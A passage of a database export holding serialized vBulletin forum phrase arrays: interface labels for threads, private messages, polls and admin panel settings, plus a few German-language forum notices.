\";s:14:\"notice_16_html\";s:600:\"\r\n\r\nYou need at least 15 posts to get moved to Usergroup \"Member\"\r\n\r\nIf there are any problems, feel free to contact us\r\n \";s:14:\"notice_17_html\";s:135:\"Da du in letzer Zeit inaktiv warst, bist du aus dem Level2 entfernt worden, für weitere Informationen wende dich bitte an ¥akuza112 ;-)\";s:13:\"notice_1_html\";s:399:\"\r\n\r\n\r\n\r\nDu willst einen Bannerplatz kaufen? Dann kontaktiere die Administration .\r\n \r\n\r\n\r\n \r\n \r\n\r\n\r\n\r\n
\r\n \r\n \r\n
\r\n\";s:13:\"notice_8_html\";s:1384:\"\";s:7:\"notices\";s:7:\"Notices\";s:12:\"notification\";s:12:\"Notification\";s:17:\"notification_type\";s:17:\"Notification Type\";s:8:\"november\";s:8:\"November\";s:17:\"number_of_replies\";s:17:\"Number of Replies\";s:15:\"number_of_views\";s:15:\"Number of Views\";s:13:\"numeric_value\";s:4:\"%1$s\";s:24:\"numeric_value_emphasized\";s:21:\"%1$s \";s:7:\"october\";s:7:\"October\";s:3:\"off\";s:3:\"Off\";s:7:\"offline\";s:7:\"Offline\";s:8:\"offline1\";s:10:\"is Offline\";s:4:\"okay\";s:4:\"Okay\";s:3:\"old\";s:3:\"Old\";s:5:\"older\";s:5:\"Older\";s:2:\"on\";s:2:\"On\";s:6:\"online\";s:6:\"Online\";s:7:\"online1\";s:9:\"is Online\";s:19:\"only_used_to_report\";s:139:\"Note : This is ONLY to be used to report spam, advertising messages, and problematic (harassment, fighting, or rude) posts.\";s:13:\"open_contacts\";s:19:\"Open Contacts Popup\";s:26:\"open_message_in_new_window\";s:82:\"Open the message in a new window?\\n\\n(Press cancel to open in the current window.)\";s:6:\"option\";s:6:\"Option\";s:35:\"option_2_upload_image_from_computer\";s:42:\"Option 2 - Upload Image From Your Computer\";s:8:\"optional\";s:8:\"Optional\";s:7:\"options\";s:7:\"Options\";s:2:\"or\";s:2:\"or\";s:22:\"originally_posted_by_x\";s:42:\"Originally Posted by %1$s \";s:6:\"page_x\";s:9:\"Page %1$s\";s:11:\"page_x_of_y\";s:17:\"Page %1$s of %2$s\";s:13:\"pagenav_first\";s:5:\"First\";s:12:\"pagenav_last\";s:4:\"Last\";s:5:\"pages\";s:5:\"Pages\";s:18:\"paid_subscriptions\";s:18:\"Paid Subscriptions\";s:8:\"password\";s:8:\"Password\";s:8:\"per_page\";s:8:\"Per Page\";s:14:\"perform_action\";s:14:\"Perform Action\";s:8:\"php_code\";s:8:\"PHP Code\";s:34:\"picture_comments_awaiting_approval\";s:34:\"Picture Comments Awaiting Approval\";s:19:\"pictures_and_albums\";s:22:\"Pictures & Albums \";s:21:\"please_enter_the_text\";s:74:\"Please enter the six letters or digits that appear in the image opposite. \";s:17:\"please_select_one\";s:17:\"Please select one\";s:8:\"pm_users\";s:8:\"PM Users\";s:4:\"poll\";s:4:\"Poll\";s:12:\"poll_options\";s:12:\"Poll Options\";s:18:\"poll_thread_prefix\";s:6:\"Poll: \";s:4:\"post\";s:4:\"Post\";s:10:\"post_icons\";s:10:\"Post Icons\";s:18:\"post_new_user_note\";s:18:\"Post New User Note\";s:16:\"post_time_x_at_y\";s:23:\"Post Time: %1$s at %2$s\";s:14:\"post_user_note\";s:14:\"Post User Note\";s:6:\"post_x\";s:9:\"Post %1$s\";s:9:\"posted_by\";s:9:\"Posted By\";s:13:\"posting_rules\";s:13:\"Posting Rules\";s:5:\"posts\";s:5:\"Posts\";s:20:\"powered_by_vbulletin\";s:98:\"Powered by vBulletin® Version %1$s Copyright ©2000 - %2$s, vBulletin Solutions, Inc.\";s:26:\"prefix_English_title_plain\";s:9:\"[English]\";s:25:\"prefix_English_title_rich\";s:9:\"[English]\";s:28:\"prefix_bewerbung_title_plain\";s:11:\"[Bewerbung]\";s:27:\"prefix_bewerbung_title_rich\";s:11:\"[Bewerbung]\";s:4:\"prev\";s:4:\"Prev\";s:9:\"prev_page\";s:9:\"Prev Page\";s:18:\"prev_picture_short\";s:4:\"Prev\";s:8:\"previous\";s:8:\"Previous\";s:22:\"previous_picture_short\";s:4:\"Prev\";s:17:\"privacy_statement\";s:17:\"Privacy Statement\";s:7:\"private\";s:7:\"Private\";s:15:\"private_message\";s:15:\"Private Message\";s:16:\"private_messages\";s:16:\"Private Messages\";s:20:\"private_messages_nav\";s:59:\"Private Messages : %1$s, %2$s.\";s:7:\"proceed\";s:9:\" Proceed \";s:42:\"profile_visitor_messages_awaiting_approval\";s:27:\"Unapproved Visitor Messages\";s:29:\"public_poll_users_see_choices\";s:86:\"Be advised that this is a public poll: other users can see the choice(s) you selected.\";s:22:\"quick_language_chooser\";s:22:\"Quick Language Chooser\";s:11:\"quick_links\";s:11:\"Quick Links\";s:19:\"quick_style_chooser\";s:19:\"Quick Style Chooser\";s:5:\"quote\";s:5:\"Quote\";s:15:\"random_question\";s:15:\"Random Question\";s:11:\"rate_thread\";s:11:\"Rate Thread\";s:6:\"reason\";s:6:\"Reason\";s:8:\"redirect\";s:8:\"Redirect\";s:11:\"redirecting\";s:14:\"Redirecting...\";s:13:\"refresh_image\";s:13:\"Refresh Image\";s:8:\"register\";s:8:\"Register\";s:6:\"reload\";s:6:\"Reload\";s:16:\"reload_this_page\";s:16:\"Reload this Page\";s:11:\"remember_me\";s:12:\"Remember Me?\";s:6:\"remove\";s:6:\"Remove\";s:7:\"replace\";s:7:\"Replace\";s:7:\"replies\";s:7:\"Replies\";s:17:\"replies_x_views_y\";s:26:\"Replies: %1$s, Views: %2$s\";s:5:\"reply\";s:5:\"Reply\";s:12:\"reply_prefix\";s:3:\"Re:\";s:10:\"reputation\";s:10:\"Reputation\";s:19:\"reputation_disabled\";s:23:\"has disabled reputation\";s:14:\"request_reason\";s:14:\"Request Reason\";s:29:\"request_username_password_now\";s:31:\"Request Username / Password Now\";s:26:\"requests_to_join_usergroup\";s:26:\"Requests to Join Usergroup\";s:35:\"requests_to_join_your_social_groups\";s:27:\"Social Groups Join Requests\";s:5:\"reset\";s:5:\"Reset\";s:12:\"reset_fields\";s:12:\"Reset Fields\";s:19:\"results_x_to_y_of_z\";s:28:\"Results %1$s to %2$s of %3$s\";s:18:\"reverse_sort_order\";s:18:\"Reverse Sort Order\";s:20:\"review_join_requests\";s:20:\"Review Join Requests\";s:8:\"saturday\";s:8:\"Saturday\";s:4:\"save\";s:4:\"Save\";s:12:\"save_changes\";s:12:\"Save Changes\";s:12:\"save_folders\";s:12:\"Save Folders\";s:6:\"search\";s:6:\"Search\";s:13:\"search_forums\";s:13:\"Search Forums\";s:14:\"search_results\";s:14:\"Search Results\";s:18:\"search_titles_only\";s:18:\"Search Titles Only\";s:6:\"second\";s:6:\"Second\";s:34:\"select_destination_folder_for_move\";s:71:\"Please select a destination folder for the items that you wish to move.\";s:16:\"selected_threads\";s:16:\"Selected Threads\";s:4:\"send\";s:4:\"Send\";s:25:\"send_message_via_aim_to_x\";s:30:\"Send a message via AIM to %1$s\";s:27:\"send_message_via_email_to_x\";s:32:\"Send a message via email to %1$s\";s:25:\"send_message_via_icq_to_x\";s:30:\"Send a message via ICQ to %1$s\";s:25:\"send_message_via_msn_to_x\";s:30:\"Send a message via MSN to %1$s\";s:27:\"send_message_via_skype_to_x\";s:39:\"Send a message via Skype™ to %1$s\";s:27:\"send_message_via_yahoo_to_x\";s:32:\"Send a message via Yahoo to %1$s\";s:16:\"send_new_message\";s:16:\"Send New Message\";s:38:\"send_private_message_to_selected_users\";s:40:\"Send a private message to selected users\";s:25:\"send_private_message_to_x\";s:30:\"Send a private message to %1$s\";s:11:\"send_report\";s:11:\"Send Report\";s:10:\"sent_items\";s:10:\"Sent Items\";s:9:\"september\";s:9:\"September\";s:11:\"show_groups\";s:11:\"Show Groups\";s:17:\"show_message_text\";s:17:\"Show Message Text\";s:10:\"show_posts\";s:10:\"Show Posts\";s:24:\"show_results_x_to_y_of_z\";s:33:\"Show results %1$s to %2$s of %3$s\";s:28:\"show_thread_and_close_window\";s:30:\"Show Thread & Close Window\";s:12:\"show_threads\";s:12:\"Show Threads\";s:26:\"show_threads_from_last_day\";s:26:\"Show threads from last day\";s:28:\"show_threads_from_last_month\";s:28:\"Show threads from last month\";s:27:\"show_threads_from_last_week\";s:27:\"Show threads from last week\";s:29:\"show_threads_from_last_x_days\";s:32:\"Show threads from last %1$s days\";s:31:\"show_threads_from_last_x_months\";s:34:\"Show threads from last %1$s months\";s:30:\"show_threads_from_last_x_weeks\";s:33:\"Show threads from last %1$s weeks\";s:27:\"show_threads_from_last_year\";s:27:\"Show threads from last year\";s:15:\"show_thumbnails\";s:15:\"Show Thumbnails\";s:27:\"showing_results_x_to_y_of_z\";s:36:\"Showing results %1$s to %2$s of %3$s\";s:28:\"showing_x_smilies_of_y_total\";s:37:\"Showing %1$s smilie(s) of %2$s total.\";s:20:\"showthread_list_next\";s:4:\"Next\";s:20:\"showthread_list_prev\";s:4:\"Prev\";s:9:\"signature\";s:9:\"Signature\";s:10:\"site_areas\";s:10:\"Site Areas\";s:11:\"smilie_list\";s:11:\"Smilie List\";s:7:\"smilies\";s:7:\"Smilies\";s:13:\"smilies_are_x\";s:68:\"Smilies are %2$s \";s:24:\"social_group_discussions\";s:24:\"Social Group Discussions\";s:21:\"social_group_messages\";s:21:\"Social Group Messages\";s:13:\"social_groups\";s:13:\"Social Groups\";s:10:\"start_date\";s:10:\"Start Date\";s:13:\"sticky_thread\";s:13:\"Sticky Thread\";s:20:\"sticky_thread_prefix\";s:8:\"Sticky: \";s:9:\"subforums\";s:10:\"Sub-Forums\";s:7:\"subject\";s:7:\"Subject\";s:6:\"submit\";s:6:\"Submit\";s:11:\"submit_note\";s:11:\"Submit Note\";s:23:\"subscribe_to_discussion\";s:23:\"Subscribe to Discussion\";s:18:\"subscribe_to_forum\";s:18:\"Subscribe to Forum\";s:19:\"subscribe_to_thread\";s:19:\"Subscribe to Thread\";s:18:\"subscribed_threads\";s:18:\"Subscribed Threads\";s:28:\"subscribed_threads_in_folder\";s:28:\"Subscribed Threads in Folder\";s:12:\"subscription\";s:12:\"Subscription\";s:18:\"subscription_title\";s:18:\"Subscription Title\";s:13:\"subscriptions\";s:13:\"Subscriptions\";s:29:\"sum_of_attachments_owned_by_x\";s:36:\"Sum of all attachments owned by %1$s\";s:6:\"sunday\";s:6:\"Sunday\";s:24:\"sure_you_want_to_log_out\";s:33:\"Are you sure you want to log out?\";s:3:\"tag\";s:3:\"Tag\";s:10:\"tag_search\";s:10:\"Tag Search\";s:4:\"tags\";s:4:\"Tags\";s:16:\"terms_of_service\";s:16:\"Terms of Service\";s:26:\"text_editor_control_styles\";s:26:\"Text Editor Control Styles\";s:56:\"there_are_no_outstanding_requests_to_join_this_usergroup\";s:57:\"There are no outstanding requests to join this usergroup.\";s:19:\"this_poll_is_closed\";s:19:\"This poll is closed\";s:30:\"this_poll_will_close_on_x_at_y\";s:70:\"This poll will close on %1$s at %2$s \";s:41:\"this_post_will_be_automatically_moderated\";s:41:\"This post will be automatically moderated\";s:6:\"thread\";s:6:\"Thread\";s:19:\"thread_deleted_by_x\";s:41:\"Thread deleted by %2$s \";s:31:\"thread_rating_x_votes_y_average\";s:40:\"Thread Rating: %1$s votes, %2$s average.\";s:14:\"thread_starter\";s:14:\"Thread Starter\";s:7:\"threads\";s:7:\"Threads\";s:8:\"thursday\";s:8:\"Thursday\";s:4:\"time\";s:4:\"Time\";s:8:\"timezone\";s:8:\"Timezone\";s:5:\"title\";s:5:\"Title\";s:2:\"to\";s:2:\"To\";s:19:\"to_add_a_new_folder\";s:109:\"To add a new folder, enter the name of the new folder in one of the empty boxes in the list.\";s:29:\"to_delete_user_note_check_box\";s:91:\"To delete this user note, check the box below and then click the \'Delete this Note\' button.\";s:18:\"to_rename_a_folder\";s:72:\"To rename a folder, edit the folder\'s name in the list.\";s:5:\"today\";s:5:\"Today\";s:16:\"todays_birthdays\";s:17:\"Today\'s Birthdays\";s:13:\"todays_events\";s:14:\"Today\'s Events\";s:12:\"todays_posts\";s:13:\"Today\'s Posts\";s:3:\"top\";s:3:\"Top\";s:5:\"total\";s:5:\"Total\";s:13:\"total_posts_x\";s:17:\"Total Posts: %1$s\";s:11:\"total_x_nav\";s:10:\"Total %1$s\";s:14:\"track_messages\";s:14:\"Track Messages\";s:7:\"tuesday\";s:7:\"Tuesday\";s:16:\"twitter_checkout\";s:16:\"Check this out! \";s:11:\"unread_date\";s:6:\"Unread\";s:23:\"unread_picture_comments\";s:23:\"Unread Picture Comments\";s:23:\"unread_private_messages\";s:23:\"Unread Private Messages\";s:31:\"unread_profile_visitor_messages\";s:23:\"Unread Visitor Messages\";s:12:\"unread_x_nav\";s:11:\"Unread %1$s\";s:12:\"unregistered\";s:12:\"Unregistered\";s:11:\"unsubscribe\";s:11:\"Unsubscribe\";s:27:\"unsubscribe_from_this_forum\";s:27:\"Unsubscribe from this Forum\";s:35:\"upcoming_events_for_the_next_x_days\";s:40:\"Upcoming Events for the Next %1$s Day(s)\";s:24:\"update_subscription_type\";s:24:\"Update Subscription Type\";s:20:\"updating_post_counts\";s:20:\"Updating Post Counts\";s:6:\"upload\";s:6:\"Upload\";s:13:\"upload_errors\";s:13:\"Upload Errors\";s:4:\"user\";s:4:\"User\";s:18:\"user_control_panel\";s:18:\"User Control Panel\";s:7:\"user_cp\";s:7:\"User CP\";s:9:\"user_name\";s:9:\"User Name\";s:16:\"user_notes_for_x\";s:19:\"User Notes for %1$s\";s:9:\"usergroup\";s:9:\"Usergroup\";s:10:\"usergroups\";s:10:\"Usergroups\";s:6:\"userid\";s:6:\"Userid\";s:8:\"username\";s:9:\"User Name\";s:21:\"valid_file_extensions\";s:21:\"Valid file extensions\";s:11:\"vbtag_cloud\";s:11:\"Search Tags\";s:19:\"vbulletin_copyright\";s:74:\"vBulletin® v%1$s, Copyright ©2000-%2$s, vBulletin Solutions, Inc.\";s:17:\"vbulletin_message\";s:17:\"vBulletin Message\";s:4:\"view\";s:4:\"View\";s:22:\"view_all_announcements\";s:22:\"View All Announcements\";s:27:\"view_all_subscribed_threads\";s:27:\"View all Subscribed Threads\";s:17:\"view_announcement\";s:17:\"View Announcement\";s:14:\"view_birthdays\";s:14:\"View Birthdays\";s:18:\"view_forum_leaders\";s:18:\"View Forum Leaders\";s:17:\"view_poll_results\";s:17:\"View Poll Results\";s:9:\"view_post\";s:9:\"View Post\";s:12:\"view_profile\";s:12:\"View Profile\";s:16:\"view_whos_online\";s:17:\"View Who\'s Online\";s:5:\"views\";s:5:\"Views\";s:16:\"visitor_messages\";s:16:\"Visitor Messages\";s:8:\"vote_now\";s:8:\"Vote Now\";s:6:\"voters\";s:6:\"Voters\";s:5:\"votes\";s:5:\"Votes\";s:9:\"wednesday\";s:9:\"Wednesday\";s:4:\"week\";s:4:\"Week\";s:25:\"weekly_email_notification\";s:25:\"Weekly email notification\";s:23:\"weekly_updates_by_email\";s:23:\"Weekly updates by email\";s:5:\"weeks\";s:5:\"Weeks\";s:30:\"welcome_to_our_newest_member_x\";s:53:\"Welcome to our newest member, %2$s \";s:16:\"welcome_to_the_x\";s:20:\"Welcome to the %1$s.\";s:9:\"welcome_x\";s:14:\"Welcome, %1$s.\";s:16:\"welcome_x_link_y\";s:33:\"Welcome, %1$s .\";s:14:\"whats_going_on\";s:16:\"What\'s Going On?\";s:10:\"who_posted\";s:11:\"Who Posted?\";s:11:\"whos_online\";s:12:\"Who\'s Online\";s:26:\"window_open_failed_blocker\";s:77:\"Unable to open a new browser window,\\n This might be due to a \'popup blocker\'\";s:22:\"within_the_last_x_days\";s:25:\"Within the Last %1$s Days\";s:13:\"x_attachments\";s:18:\"%1$s Attachment(s)\";s:10:\"x_days_ago\";s:13:\"%1$s Days Ago\";s:25:\"x_does_not_have_any_notes\";s:39:\"%1$s does not currently have any notes.\";s:11:\"x_downloads\";s:14:\"%1$s Downloads\";s:11:\"x_hours_ago\";s:14:\"%1$s Hours Ago\";s:14:\"x_is_invisible\";s:17:\"%1$s is invisible\";s:12:\"x_is_offline\";s:15:\"%1$s is offline\";s:24:\"x_is_on_your_ignore_list\";s:80:\"%1$s is on your ignore list .\";s:15:\"x_is_online_now\";s:18:\"%1$s is online now\";s:6:\"x_is_y\";s:12:\"%1$s is %2$s\";s:8:\"x_mailer\";s:4:\"%1$s\";s:22:\"x_members_and_y_guests\";s:28:\"%1$s members and %2$s guests\";s:13:\"x_minutes_ago\";s:16:\"%1$s Minutes Ago\";s:6:\"x_of_y\";s:12:\"%1$s of %2$s\";s:22:\"x_powered_by_vbulletin\";s:27:\"%1$s - Powered by vBulletin\";s:12:\"x_statistics\";s:15:\"%1$s Statistics\";s:9:\"x_viewing\";s:12:\"%1$s Viewing\";s:11:\"x_weeks_ago\";s:14:\"%1$s Weeks Ago\";s:12:\"x_y_requests\";s:20:\"%1$s (%2$s requests)\";s:4:\"year\";s:4:\"Year\";s:5:\"years\";s:5:\"Years\";s:3:\"yes\";s:3:\"Yes\";s:9:\"yesterday\";s:9:\"Yesterday\";s:33:\"you_are_subscribed_to_this_thread\";s:33:\"You are subscribed to this thread\";s:35:\"you_have_already_voted_on_this_poll\";s:35:\"You have already voted on this poll\";s:45:\"you_have_been_invited_to_the_following_groups\";s:45:\"You have been invited to the following groups\";s:23:\"you_may_edit_your_posts\";s:40:\"You may edit your posts\";s:27:\"you_may_not_edit_your_posts\";s:44:\"You may not edit your posts\";s:28:\"you_may_not_post_attachments\";s:45:\"You may not post attachments\";s:28:\"you_may_not_post_new_threads\";s:45:\"You may not post new threads\";s:24:\"you_may_not_post_replies\";s:41:\"You may not post replies\";s:29:\"you_may_not_vote_on_this_poll\";s:29:\"You may not vote on this poll\";s:36:\"you_may_only_attach_x_files_per_post\";s:45:\"You may only attach up to %1$s files per post\";s:24:\"you_may_post_attachments\";s:41:\"You may post attachments\";s:24:\"you_may_post_new_threads\";s:41:\"You may post new threads\";s:20:\"you_may_post_replies\";s:37:\"You may post replies\";s:12:\"your_folders\";s:12:\"Your Folders\";s:18:\"your_notifications\";s:18:\"Your Notifications\";s:21:\"your_pm_box_is_x_full\";s:27:\"Your PM box is %1$s%% full.\";s:12:\"your_profile\";s:12:\"Your Profile\";s:13:\"your_username\";s:13:\"Your Username\";}', 'a:183:{s:12:\"access_masks\";s:12:\"Access Masks\";s:6:\"active\";s:6:\"Active\";s:3:\"add\";s:3:\"Add\";s:14:\"add_new_notice\";s:14:\"Add New Notice\";s:16:\"add_new_rss_feed\";s:16:\"Add New RSS Feed\";s:31:\"add_new_social_bookmarking_site\";s:31:\"Add New Social Bookmarking Site\";s:21:\"additional_usergroups\";s:21:\"Additional Usergroups\";s:25:\"administrator_permissions\";s:25:\"Administrator Permissions\";s:11:\"all_default\";s:11:\"All Default\";s:6:\"all_no\";s:6:\"All No\";s:14:\"all_usergroups\";s:14:\"All Usergroups\";s:9:\"all_users\";s:9:\"All Users\";s:7:\"all_yes\";s:7:\"All Yes\";s:21:\"allow_privacy_options\";s:122:\"Allow User Privacy OptionsAllow users to hide the category in their profile from other users of their choosing. \";s:20:\"allow_user_selection\";s:20:\"Allow User Selection\";s:20:\"announcement_manager\";s:20:\"Announcement Manager\";s:42:\"are_you_sure_want_to_delete_announcement_x\";s:166:\"Are you sure you want to delete the announcement called \'%1$s\'?(%2$s: %3$s) %4$s This action cannot be undone.\";s:42:\"are_you_sure_want_to_delete_bookmarksite_x\";s:177:\"Are you sure you want to delete the social bookmarking site called \'%1$s\'?(%2$s: %3$s) %4$s This action cannot be undone.\";s:9:\"ascending\";s:9:\"Ascending\";s:7:\"avatars\";s:7:\"Avatars\";s:12:\"banned_users\";s:12:\"Banned Users\";s:9:\"check_all\";s:9:\"Check All\";s:10:\"child_of_x\";s:13:\"Child of %1$s\";s:31:\"click_for_help_on_these_options\";s:31:\"Click for help on these options\";s:29:\"click_for_help_on_this_option\";s:29:\"Click for help on this option\";s:33:\"click_here_to_continue_processing\";s:37:\"Click here to continue processing ...\";s:5:\"close\";s:5:\"Close\";s:9:\"color_key\";s:9:\"Color Key\";s:9:\"completed\";s:9:\"Completed\";s:16:\"confirm_deletion\";s:16:\"Confirm Deletion\";s:18:\"confirm_deletion_x\";s:50:\"Confirm Deletion: %1$s \";s:8:\"continue\";s:8:\"Continue\";s:17:\"control_panel_log\";s:17:\"Control Panel Log\";s:8:\"controls\";s:8:\"Controls\";s:7:\"creator\";s:7:\"Creator\";s:54:\"customized_using_custom_permissions_for_this_usergroup\";s:62:\"Customized: Using custom permissions for this usergroup\";s:20:\"data_validation_type\";s:20:\"Data Validation Type\";s:15:\"database_backup\";s:15:\"Database Backup\";s:16:\"default_view_age\";s:69:\"Default View Age (Default date cut-off for thread display) \";s:10:\"delete_all\";s:10:\"Delete All\";s:16:\"delete_moderator\";s:16:\"Delete Moderator\";s:20:\"delete_this_category\";s:20:\"Delete this Category\";s:10:\"descending\";s:10:\"Descending\";s:11:\"description\";s:11:\"Description\";s:17:\"developer_options\";s:17:\"Developer Options\";s:11:\"diagnostics\";s:11:\"Diagnostics\";s:7:\"disable\";s:7:\"Disable\";s:13:\"display_order\";s:13:\"Display Order\";s:8:\"download\";s:8:\"Download\";s:9:\"edit_text\";s:9:\"Edit Text\";s:6:\"either\";s:6:\"Either\";s:6:\"enable\";s:6:\"Enable\";s:23:\"enable_disable_features\";s:25:\"Enable / Disable Features\";s:7:\"enabled\";s:7:\"Enabled\";s:5:\"error\";s:5:\"Error\";s:11:\"exact_match\";s:11:\"Exact Match\";s:17:\"execute_sql_query\";s:17:\"Execute SQL Query\";s:10:\"expand_all\";s:10:\"Expand All\";s:14:\"field_required\";s:14:\"Field Required\";s:8:\"filename\";s:8:\"Filename\";s:4:\"find\";s:4:\"Find\";s:32:\"find_all_threads_older_than_days\";s:34:\"Find All Threads Older Than X Days\";s:18:\"forum_and_children\";s:47:\"Forum (Also applies to child forums) \";s:21:\"generate_mailing_list\";s:21:\"Generate Mailing List\";s:20:\"global_announcements\";s:20:\"Global Announcements\";s:4:\"help\";s:4:\"Help\";s:54:\"here_you_may_edit_forum_access_on_a_user_by_user_basis\";s:561:\"Here you may edit forum access on a user-by-user basis. Selecting \"Yes\" will allow the user access to the forum. Selecting \"No\" will deny the user access to the forum. Any changes made to one user\'s account will override the default permission settings in their usergroup. Selecting \"Default\" will revert the user to the default permissions settings for their usergroup. (Please note that the permission inheritance system still works here.) (Ensure that you have access masks enabled before attempting to use these!)\";s:9:\"home_page\";s:9:\"Home Page\";s:9:\"host_name\";s:9:\"Host Name\";s:4:\"hour\";s:4:\"Hour\";s:17:\"html_content_type\";s:17:\"HTML Content Type\";s:4:\"icon\";s:4:\"Icon\";s:22:\"icon_bookmarksite_help\";s:91:\"Filename for Icon. This must be placed in your misc image directory (default: images/misc).\";s:52:\"if_you_are_not_automatically_redirected_click_here_x\";s:78:\"If you are not automatically redirected, please click here .\";s:27:\"if_you_change_display_order\";s:131:\"If you change the display orders, please be sure to submit the form using the \'Save Display Order\' button at the bottom of the page\";s:5:\"image\";s:5:\"Image\";s:6:\"import\";s:6:\"Import\";s:15:\"import_xml_file\";s:46:\"OR import the XML file from your server\";s:24:\"invalid_action_specified\";s:24:\"Invalid Action Specified\";s:23:\"invalid_forum_parenting\";s:57:\"Invalid forum parenting setup. Contact vBulletin support.\";s:8:\"language\";s:8:\"Language\";s:14:\"large_edit_box\";s:14:\"Large Edit Box\";s:4:\"link\";s:4:\"Link\";s:31:\"link_replacement_variables_help\";s:84:\"Replacement variables: {URL} is the given page url, {TITLE} is the given page title.\";s:35:\"logged_in_user_x_executed_y_queries\";s:44:\"Logged-in user: %1$s; Executed %2$s queries.\";s:4:\"logs\";s:4:\"Logs\";s:11:\"maintenance\";s:11:\"Maintenance\";s:9:\"mass_move\";s:9:\"Mass Move\";s:32:\"max_length_of_allowed_user_input\";s:32:\"Max length of allowed user input\";s:15:\"maximum_chars_x\";s:19:\"Maximum Chars: %1$s\";s:13:\"minimum_posts\";s:13:\"Minimum Posts\";s:6:\"minute\";s:6:\"Minute\";s:10:\"moderation\";s:10:\"Moderation\";s:13:\"moderator_log\";s:13:\"Moderator Log\";s:18:\"moderator_username\";s:18:\"Moderator Username\";s:19:\"moderator_usernames\";s:19:\"Moderator Usernames\";s:6:\"modify\";s:6:\"Modify\";s:4:\"move\";s:4:\"Move\";s:40:\"no_file_uploaded_and_no_local_file_found\";s:46:\"No file uploaded and no local file found. %1$s\";s:6:\"no_one\";s:6:\"No one\";s:10:\"no_posting\";s:10:\"No Posting\";s:15:\"notices_manager\";s:15:\"Notices Manager\";s:8:\"order_by\";s:8:\"Order By\";s:13:\"order_by_date\";s:13:\"Order By Date\";s:17:\"order_by_username\";s:18:\"Order By User Name\";s:4:\"page\";s:4:\"Page\";s:12:\"parent_forum\";s:12:\"Parent Forum\";s:12:\"parent_style\";s:12:\"Parent Style\";s:9:\"permanent\";s:9:\"Permanent\";s:11:\"phrase_type\";s:11:\"Phrase Type\";s:7:\"phrases\";s:7:\"Phrases\";s:11:\"please_wait\";s:14:\"Please Wait...\";s:17:\"primary_usergroup\";s:17:\"Primary Usergroup\";s:27:\"processing_complete_proceed\";s:29:\"Processing Complete - Proceed\";s:12:\"processing_x\";s:16:\"Processing: %1$s\";s:7:\"product\";s:7:\"Product\";s:10:\"promotions\";s:10:\"Promotions\";s:5:\"prune\";s:5:\"Prune\";s:23:\"prune_post_edit_history\";s:23:\"Prune Post Edit History\";s:8:\"question\";s:8:\"Question\";s:12:\"quick_search\";s:12:\"Quick Search\";s:25:\"rebuild_style_information\";s:25:\"Rebuild Style Information\";s:8:\"reminder\";s:8:\"Reminder\";s:14:\"repeat_process\";s:14:\"Repeat Process\";s:17:\"replace_with_text\";s:17:\"Replace with Text\";s:16:\"reputation_level\";s:16:\"Reputation Level\";s:7:\"restart\";s:7:\"Restart\";s:7:\"results\";s:7:\"Results\";s:6:\"revert\";s:6:\"Revert\";s:16:\"rss_feed_manager\";s:16:\"RSS Feed Manager\";s:18:\"save_display_order\";s:18:\"Save Display Order\";s:19:\"save_enabled_status\";s:19:\"Save Enabled Status\";s:30:\"save_open_groups_automatically\";s:30:\"Save open groups automatically\";s:10:\"save_prefs\";s:10:\"Save Prefs\";s:18:\"scheduled_task_log\";s:18:\"Scheduled Task Log\";s:6:\"script\";s:6:\"Script\";s:15:\"search_for_text\";s:15:\"Search for Text\";s:11:\"search_in_x\";s:14:\"Search in %1$s\";s:11:\"search_type\";s:11:\"Search Type\";s:12:\"select_forum\";s:12:\"Select Forum\";s:28:\"separate_usernames_semicolon\";s:38:\"Separate multiple usernames with a \';\'\";s:11:\"set_default\";s:11:\"Set Default\";s:13:\"setting_group\";s:13:\"Setting Group\";s:16:\"settings_to_edit\";s:107:\"Settings to Edit Select the settings type you want to edit and click the \"Edit Settings\" button. \";s:26:\"social_bookmarking_manager\";s:26:\"Social Bookmarking Manager\";s:44:\"standard_using_default_usergroup_permissions\";s:52:\"Standard: Using default usergroup permissions\";s:10:\"statistics\";s:10:\"Statistics\";s:6:\"status\";s:6:\"Status\";s:5:\"style\";s:5:\"Style\";s:6:\"styles\";s:6:\"Styles\";s:8:\"stylevar\";s:8:\"Stylevar\";s:9:\"stylevars\";s:9:\"StyleVars\";s:5:\"table\";s:5:\"Table\";s:9:\"templates\";s:9:\"Templates\";s:4:\"text\";s:4:\"Text\";s:9:\"thumbnail\";s:9:\"Thumbnail\";s:23:\"to_continue_this_action\";s:81:\"To continue this action, login using the admin account that initiated the action.\";s:28:\"toggle_active_status_for_all\";s:28:\"Toggle Active Status for All\";s:12:\"translations\";s:12:\"Translations\";s:13:\"unknown_error\";s:13:\"Unknown Error\";s:6:\"update\";s:6:\"Update\";s:16:\"updated_x_styles\";s:21:\"Updated %1$s style(s)\";s:15:\"upload_xml_file\";s:52:\"EITHER upload the XML file from your computer\";s:18:\"user_profile_field\";s:18:\"User Profile Field\";s:19:\"user_profile_fields\";s:19:\"User Profile Fields\";s:9:\"user_rank\";s:9:\"User Rank\";s:17:\"usergroup_options\";s:17:\"Usergroup Options\";s:5:\"users\";s:5:\"Users\";s:16:\"utf8encode_title\";s:19:\"UTF8 Encode {TITLE}\";s:21:\"utf8encode_title_help\";s:90:\"Some sites (such as twitter.com) require URL to be encoded. Set \"Yes\" if this is required.\";s:7:\"varname\";s:7:\"Varname\";s:17:\"vbulletin_default\";s:66:\"vBulletin Default (Will be replaced by upgrade scripts) \";s:17:\"vbulletin_options\";s:17:\"vBulletin Options\";s:24:\"view_reputation_comments\";s:24:\"View Reputation Comments\";s:9:\"who_voted\";s:9:\"Who Voted\";s:49:\"x_enter_the_options_that_the_user_can_choose_from\";s:120:\"%1$sEnter the options that the user can choose from. Separate each option with a new-line (carriage return). \";s:21:\"x_from_the_calendar_y\";s:41:\"%1$s from the calendar %2$s \";s:18:\"x_from_the_forum_y\";s:38:\"%1$s from the forum %2$s \";s:6:\"x_to_y\";s:12:\"%1$s to %2$s\";s:13:\"x_translation\";s:16:\"%1$s Translation\";s:8:\"x_y_id_z\";s:49:\"%1$s: %2$s (id: %3$s) \";s:36:\"you_did_not_specify_a_file_to_upload\";s:141:\"You did not specify a file to upload, so vBulletin will attempt to import the file\\n\\n%1$s\\n\\nfrom the server\'s file system.\\n\\nAre you sure?\";s:22:\"zero_equals_no_display\";s:35:\"Set to \'0\' to not display this item\";}', 'a:283:{s:20:\"additional_functions\";s:20:\"Additional Functions\";s:13:\"administrator\";s:13:\"Administrator\";s:33:\"administrator_permissions_manager\";s:33:\"Administrator Permissions Manager\";s:18:\"album_max_pictures\";s:32:\"Maximum Number of Album Pictures\";s:14:\"album_max_size\";s:78:\"Maximum Total File Size of Album Pictures (bytes)\r\n1KB = 1024 bytes 